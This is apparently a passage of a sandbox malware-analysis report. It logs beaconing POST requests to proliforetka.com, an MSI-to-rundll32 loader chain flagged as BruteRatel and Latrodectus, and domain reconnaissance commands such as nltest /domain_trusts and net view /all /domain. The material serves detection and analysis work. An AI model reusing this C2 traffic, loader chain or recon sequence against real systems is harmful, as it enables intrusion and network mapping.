                                                                                                                                Cookie: zQQrf4YZ+DXxJ4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:51 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSJhlfWvkTc%2BKyPbmwYb3ix%2BQYSOOWCgrsgj%2FLZkdgghRLXajlD8DzdUFymsagzxIjlKTp0bUkv3Ov4tVqQDNpaO6rwOhtxoBx4sP5gIKS194Y6tSV1hhxRldYhuWNysa4JZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875d56d07d124-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81429&min_rtt=81133&rtt_var=30636&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=35990&cwnd=32&unsent_bytes=0&cid=237e34785763a190&ts=717&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
47 | 192.168.2.6 | 50043 | 172.67.161.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:52 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxIIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:53 UTC | 813 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3HZ%2FKdkz7%2BJqywmVElBXN3XgfMitbwwTayFUbbw1WkAs7EmrZ98QLCUqnHPLfqifjubI7%2BB%2FLJQ7dVIdivpSkiAVF3j8hitj0f8neoxZmk7eyFkw1UKUNI8zfo%2FXLju8BKtL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875e1cbe641ac-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1584&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1806930&cwnd=252&unsent_bytes=0&cid=cc9d80e8feb4af69&ts=742&x=0"


Session ID: 48 | Source IP: 192.168.2.6 | Source Port: 50044 | Destination IP: 172.67.161.60 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:55 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxIYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:55 UTC | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QrVhqzFWHIfqplElsqyywQSW%2BPIsMgZoPMj%2FOHURiWCS5IfPngX7qi7PdXmu3m2AkmeCuBSEBT0il%2FVmckzPTe2c8eD6gqKDSNcFHl5aPO1QkEfuYLgiGo2roVdDABmrFKe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875f04d5c440e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2471&min_rtt=2441&rtt_var=976&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1087928&cwnd=234&unsent_bytes=0&cid=631dfd53d59250e4&ts=795&x=0"


Session ID: 49 | Source IP: 192.168.2.6 | Source Port: 50045 | Destination IP: 172.67.161.60 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:57 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxIoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:57 UTC | 813 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AWjM448HvKQyn8XMhzb62h6eE9v7I4eLBVo2ms6y45BvqnW1lIk%2BW8k%2BtMf%2BcS4qEyk8K5KDZ75xZQu7AV%2Femk3lUT79D5dIFj%2FsT69DT7lLNf7TJQaAViR9BRPmVzq8EKh0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875fd783042b8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1658&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1761158&cwnd=232&unsent_bytes=0&cid=8aa973b828153a61&ts=761&x=0"


Session ID: 50 | Source IP: 192.168.2.6 | Source Port: 50046 | Destination IP: 172.67.161.60 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:59 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxI4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:59:00 UTC | 813 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:59:00 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2BKIT3JoIoNqUFNSqIVb7nU3FAo4lfyVfbVi5Q6AmcjZ6TGHGvlAC8V0XghSlbkgFYL%2B%2BKQ%2Fmss0dEJ9xYFWSDfZyQ4UN0NZLzXFyPdGSB9e%2F8k88bQ89VFqDYy9zprjFLkb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38760d3df40cac-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1745&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1059&delivery_rate=1660034&cwnd=232&unsent_bytes=0&cid=aa7114fbc9b5620c&ts=990&x=0"


Session ID: 51 | Source IP: 192.168.2.6 | Source Port: 50047 | Destination IP: 172.67.161.60 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:59:02 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxLIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:59:03 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:59:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1vBui2Ycb6gZjEw71amGY9x%2B7ez8yg68JdxgdeO%2FkW51knIxV0FFg4s13ua9Wmkv5FN8G71VvyNy9Xhb6dfE8AYvO%2FYa95kQ0dEGmJtIN4RKd7sERka1HfDlzl7e7SsiBXf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38761f0ce3d146-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81073&min_rtt=81061&rtt_var=30406&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=36022&cwnd=32&unsent_bytes=0&cid=478924a3f797edb0&ts=690&x=0"


Session ID: 52 | Source IP: 192.168.2.6 | Source Port: 50048 | Destination IP: 172.67.161.60 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:59:04 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxLYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:59:05 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:59:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jL0AD37WEpCBfYrUN7V8vpVHto65oJXy3mieQppHIfnsg7sWNp909Xc8Zs%2Bnm5LqTXQUvj7AgIm5brHX1oLcwZEltcOPSSKJX0hX%2FKRIUS%2BTOG7LTJs2xt6H88aTdCHG7P%2Fo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38762bad3a4344-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2758&min_rtt=2537&rtt_var=1395&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=677337&cwnd=47&unsent_bytes=0&cid=02a64513c199cd20&ts=697&x=0"


                                                                                                                                Target ID:0
                                                                                                                                Start time:11:54:59
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavita.msi"
                                                                                                                                Imagebase:0x7ff7d6030000
                                                                                                                                File size:69'632 bytes
                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:2
                                                                                                                                Start time:11:55:00
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                Imagebase:0x7ff7d6030000
                                                                                                                                File size:69'632 bytes
                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:3
                                                                                                                                Start time:11:55:00
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 50018695A6192D85B7480687F9E151A9
                                                                                                                                Imagebase:0xfc0000
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:4
                                                                                                                                Start time:11:55:01
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc
                                                                                                                                Imagebase:0x7ff62c070000
                                                                                                                                File size:71'680 bytes
                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000003.2394515342.000001DA031BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000002.4600031642.000001DA0329C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000002.4600031642.000001DA0330C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000002.4597607083.000001DA0318C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:7
                                                                                                                                Start time:11:55:26
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                Imagebase:0x7ff609140000
                                                                                                                                File size:5'141'208 bytes
                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.4606571879.000000000950A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:9
                                                                                                                                Start time:11:56:54
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c ipconfig /all
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:10
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:11
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:ipconfig /all
                                                                                                                                Imagebase:0x7ff7651f0000
                                                                                                                                File size:35'840 bytes
                                                                                                                                MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Target ID:12
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c systeminfo
                                                                                                                                Imagebase:0x7ff6ae840000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:13
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:14
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:systeminfo
                                                                                                                                Imagebase:0x7ff769e30000
                                                                                                                                File size:110'080 bytes
                                                                                                                                MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:15
                                                                                                                                Start time:11:56:55
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                Imagebase:0x7ff717f30000
                                                                                                                                File size:496'640 bytes
                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:16
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c nltest /domain_trusts
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:17
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:18
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\nltest.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:nltest /domain_trusts
                                                                                                                                Imagebase:0x7ff6de3c0000
                                                                                                                                File size:540'672 bytes
                                                                                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:19
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c nltest /domain_trusts /all_trusts
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:20
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:21
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\nltest.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:nltest /domain_trusts /all_trusts
                                                                                                                                Imagebase:0x7ff6de3c0000
                                                                                                                                File size:540'672 bytes
                                                                                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:22
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c net view /all /domain
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:23
                                                                                                                                Start time:11:56:56
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:24
                                                                                                                                Start time:11:56:57
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:net view /all /domain
                                                                                                                                Imagebase:0x7ff645da0000
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:25
                                                                                                                                Start time:11:57:09
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:/c net view /all
                                                                                                                                Imagebase:0x7ff790790000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:26
                                                                                                                                Start time:11:57:09
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff66e660000
